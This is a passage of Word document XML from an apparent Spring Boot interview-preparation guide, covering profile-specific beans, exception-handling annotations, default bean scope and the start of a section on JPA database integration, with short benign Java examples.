    <w:p w14:paraId="648CD9B2" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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pp.setAdditionalProfiles("dev");  // Set the active profile programmatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A888085" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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pp.run(args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B735A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rofile-specific Beans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91F82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You can also define beans that should be loaded only for specific profiles using the @Profile annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E9914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2977824D"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE833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rofile("dev")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C942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DevConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C2E01"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D98AF"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DataSource dataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43772D84"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DataSource("jdbc:mysql://localhost:3306/mydb_dev");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A06C8"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5782FABA"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6D983C4" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A0DA01"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D85678"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rofile("prod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A080C"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ProdConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64936EA7"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0708E2A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DataSource dataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEBC16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DataSource("jdbc:mysql://prod-db-server:3306/mydb_prod");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167C17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4475064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87DF5A1"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734511A7"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rofiles</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> help configure different settings for different environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC330A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activate a profile via properties files, command-line arguments, or programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2E293F" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="00CE4B95" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Profile annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to load beans conditionally based on the active profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176E205" w14:textId="7AE2985C"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02FF54E">
          <v:rect id="_x0000_i2682" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1098C386" w14:textId="1187A48C" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004D2687">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="647" w:name="_Toc196308127"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which annotations are we using in order to use the Exception</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="647"/>
    </w:p>
    <w:p w14:paraId="6175AC1B" w14:textId="6B2004D3" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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Spring Boot, you can handle exceptions in a centralized manner using specific annotations to manage errors and provide meaningful responses to the client. The primary annotations used for exception handling in Spring Boot are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A588250"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ExceptionHandler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308C3697"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annotation is used to handle specific exceptions within a controller. It defines a method that will be invoked when the exception is thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E171EB1"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t is used at the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method level</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle specific exceptions in the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28012BF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p>
    <w:p w14:paraId="500171E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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627AD74C"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA2638A" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D1724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tMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731B1DFB"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ring hello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A2BE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if (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08542C2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hrow new CustomException("Something went wrong!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E437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29DECC4D"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Hello, World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635075EB"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20C8B14F" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E46DD9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xceptionHandler(CustomException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0DFE7"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ResponseEntity&lt;String&gt; handleCustomException(CustomException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A4AC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ResponseEntity&lt;&gt;(ex.getMessage(), HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476488EB"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76E56F2B"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AE6AF9E"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ControllerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC28EC"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trollerAdvice is a class-level annotation used to define global exception handling across all controllers in the application. You can use this to handle exceptions for all controllers or specific types of exceptions globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EACE7C"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t works well with the @ExceptionHandler to centralize exception management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00425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p>
    <w:p w14:paraId="27FDCE8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trollerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE929D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public class GlobalExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F64523" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC7467A"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xceptionHandler(CustomException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE78C5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ResponseEntity&lt;String&gt; handleCustomException(CustomException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFFAD2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ResponseEntity&lt;&gt;(ex.getMessage(), HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA2E9A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1AEA1A36" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FC5718"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xceptionHandler(Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A60683"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ResponseEntity&lt;String&gt; handleGenericException(Exception ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4454C4C7"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ResponseEntity&lt;&gt;("An unexpected error occurred", HttpStatus.INTERNAL_SERVER_ERROR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030DE36F"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46DAC45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1AAD4C3"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ResponseStatus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B10C31"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annotation is used to mark a custom exception class with a specific HTTP status code. You can define the status code directly in the exception class without having to handle it explicitly in an @ExceptionHandler method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D74F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can be useful for returning specific status codes for custom exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEDE8CD"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p>
    <w:p w14:paraId="6408C09C"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ponseStatus(value = HttpStatus.BAD_REQUEST, reason = "Invalid input")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED20D18"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CustomException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4D2531"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CustomException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998899C"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uper(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE42A71"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2B3D2C2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4D3E527"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4. @RestControllerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300AF537"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imilar to @ControllerAdvice, but specifically for REST APIs. It combines @ControllerAdvice with @ResponseBody, which means the responses will be automatically serialized to JSON or XML (depending on the client's Accept header).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E15F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p>
    <w:p w14:paraId="2D4DC6E0"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tControllerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD35BEA"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GlobalExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1679E000" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C93181F"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xceptionHandler(CustomException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121138FA"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ResponseEntity&lt;String&gt; handleCustomException(CustomException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C38EE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ResponseEntity&lt;&gt;(ex.getMessage(), HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D598F"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1871742E" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5382C92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xceptionHandler(Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6B98BC"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ResponseEntity&lt;String&gt; handleGenericException(Exception ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CF4DA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ResponseEntity&lt;&gt;("An unexpected error occurred", HttpStatus.INTERNAL_SERVER_ERROR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E29B9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0078CCBA"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3552A442"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5. @ResponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7443A8"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annotation ensures that the return value of the handler method is written directly to the HTTP response body (used with @ExceptionHandler to return a response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D54548C"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p>
    <w:p w14:paraId="773C25D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ponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983D483"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ceptionHandler(CustomException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C7CBC"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String handleCustomException(CustomException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC9F54B"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ex.getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3EC2D"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A186173"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ummary of Annotations for Exception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F5038"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ceptionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Handles specific exceptions within the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77954D3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ontrollerAdvice</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides global exception handling for all controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BFD46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ResponseStatus</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sets an HTTP status code and a message for custom exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B45424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RestControllerAdvice</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Similar to @ControllerAdvice, but for REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0C47C1"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ResponseBody</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the exception response is serialized to JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3129862A"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By using these annotations, you can easily manage exceptions and provide meaningful responses to clients in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C942A9" w14:textId="6D9F596C"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444C751">
          <v:rect id="_x0000_i2683" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6CE59" w14:textId="75990111" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004D2687">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="648" w:name="_Toc196308128"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default scope for spring beans</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="648"/>
    </w:p>
    <w:p w14:paraId="1668D765" w14:textId="35982AD2" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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The default scope for Spring beans is </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1BFDC1"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE2BA90"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ingleton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the default scope for a Spring bean. This means that Spring will create only one instance of the bean per </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring IoC container</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (application context), and that same instance will be reused every time the bean is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C244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scope ensures that a single object is shared across the entire application, making it useful for beans that are meant to be stateless or are shared across multiple components in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA82B95"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CB5AB"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F21FFC"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MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C1EF98"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Singleton bean by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38118D6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1469C97D"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the above example, MyService will be a singleton bean, meaning only one instance will be created and used throughout the application unless you explicitly change the scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39636E91"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Other scopes in Spring (other than singleton):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695865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rototype</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new instance is created every time the bean is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214EC2DF"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Request</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new instance is created for each HTTP request (used in web applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659698A3"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ession</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new instance is created for each HTTP session (used in web applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A84D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Global Session</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new instance is created for each global HTTP session (used in portlet-based applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7663CC"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pplication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A single instance is created for the entire web application context, and the same instance is used across all sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF7E73"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For most cases, the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scope is sufficient, but you can change the scope if needed using annotations like @Scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675F9F82" w14:textId="36E7269B"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6F6D8C7">
          <v:rect id="_x0000_i2684" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249E12B" w14:textId="21E7847F" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00C425AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="649" w:name="_Toc196308129"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which database have you used? How do you integrate databases with JPA</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="649"/>
    </w:p>
    <w:p w14:paraId="40D7750B" w14:textId="5F757126" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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 Spring Boot applications, you can integrate a variety of relational databases with JPA (Java Persistence API) for ORM (Object-Relational Mapping). Common databases used include </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</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PostgreSQL</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H2</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Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B2069B"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teps to integrate a database with JPA in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB43974"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dd Database Dependency in pom.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
